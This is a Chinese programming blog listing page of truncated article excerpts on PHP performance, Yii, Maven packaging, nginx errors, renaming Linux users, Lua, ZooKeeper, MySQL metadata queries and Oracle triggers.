PHP技巧汇总:提高PHP性能的53个技巧　　用单引号代替双引号来包含字符串，这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量，　　单引号则不会，注意：只有echo能这么做，它是一种可以把多个字符串当作参数的函数译注：　　PHP手册中说echo是语言结构，不是真正的函数，故把函数加上了双引号)。　　1、如果能将类的方法定义成static，就尽量定义成static，它的速度会提升将近4倍
Yii框架中CGridView的使用方法以及详细示例 dcj3sjt126com yii
CGridView显示一个数据项的列表中的一个表。表中的每一行代表一个数据项的数据,和一个列通常代表一个属性的物品(一些列可能对应于复杂的表达式的属性或静态文本)。　　CGridView既支持排序和分页的数据项。排序和分页可以在AJAX模式或正常的页面请求。使用CGridView的一个好处是,当用户浏览器禁用JavaScript,排序和分页自动退化普通页面请求和仍然正常运行。实例代码如下：
Maven项目打包成可执行Jar文件 dyy_gusi assembly
Maven项目打包成可执行Jar文件在使用Maven完成项目以后，如果是需要打包成可执行的Jar文件，我们通过eclipse的导出很麻烦，还得指定入口文件的位置，还得说明依赖的jar包，既然都使用Maven了，很重要的一个目的就是让这些繁琐的操作简单。我们可以通过插件完成这项工作，使用assembly插件。具体使用方式如下： 1、在项目中加入插件的依赖： <plugin>
php常见错误 geeksun PHP
1. kevent() reported that connect() failed (61: Connection refused) while connecting to upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastc
修改linux的用户名 hongtoushizi linux change password
Change Linux Username 更改Linux用户名，需要修改4个系统的文件： /etc/passwd /etc/shadow /etc/group /etc/gshadow 古老/传统的方法是使用vi去直接修改，但是这有安全隐患（具体可自己搜一下），所以后来改成使用这些命令去代替： vipw vipw -s vigr vigr -s 具体的操作顺
第五章常用Lua开发库1-redis、mysql、http客户端 jinnianshilongnian nginx lua
对于开发来说需要有好的生态开发库来辅助我们快速开发，而Lua中也有大多数我们需要的第三方开发库如Redis、Memcached、Mysql、Http客户端、JSON、模板引擎等。一些常见的Lua库可以在github上搜索，https://github.com/search?utf8=%E2%9C%93&q=lua+resty。 Redis客户端 lua-resty-r
zkClient 监控机制实现 liyonghui160com zkClient 监控机制实现
直接使用zk的api实现业务功能比较繁琐。因为要处理session loss，session expire等异常，在发生这些异常后进行重连。又因为ZK的watcher是一次性的，如果要基于wather实现发布/订阅模式，还要自己包装一下，将一次性订阅包装成持久订阅。另外如果要使用抽象级别更高的功能，比如分布式锁，leader选举
在Mysql 众多表中查找一个表名或者字段名的 SQL 语句 pda158 mysql
在Mysql 众多表中查找一个表名或者字段名的 SQL 语句：　　方法一：SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name'; 　　方法二：SELECT column_name from information_schema.colum
程序员对英语的依赖 Smile.zeng 英语程序猿
1、程序员最基本的技能，至少要能写得出代码，当我们还在为建立类的时候思考用什么单词发牢骚的时候，英语与别人的差距就直接表现出来咯。 2、程序员最起码能认识开发工具里的英语单词，不然怎么知道使用这些开发工具。 3、进阶一点，就是能读懂别人的代码，有利于我们学习人家的思路和技术。 4、写的程序至少能有一定的可读性，至少要人别人能懂吧... 以上一些问题，充分说明了英语对程序猿的重要性。骚年
Oracle学习笔记(8) 使用PLSQL编写触发器 vipbooks oracle sql 编程活动 Access
时间过得真快啊，转眼就到了Oracle学习笔记的最后个章节了，通过前面七章的学习大家应该对Oracle编程有了一定了了解了吧，这东东如果一段时间不用很快就会忘记了，所以我会把自己学习过的东西做好详细的笔记，用到的时候可以随时查找，马上上手！希望这些笔记能对大家有些帮助！这是第八章的学习笔记，学习完第七章的子程序和包之后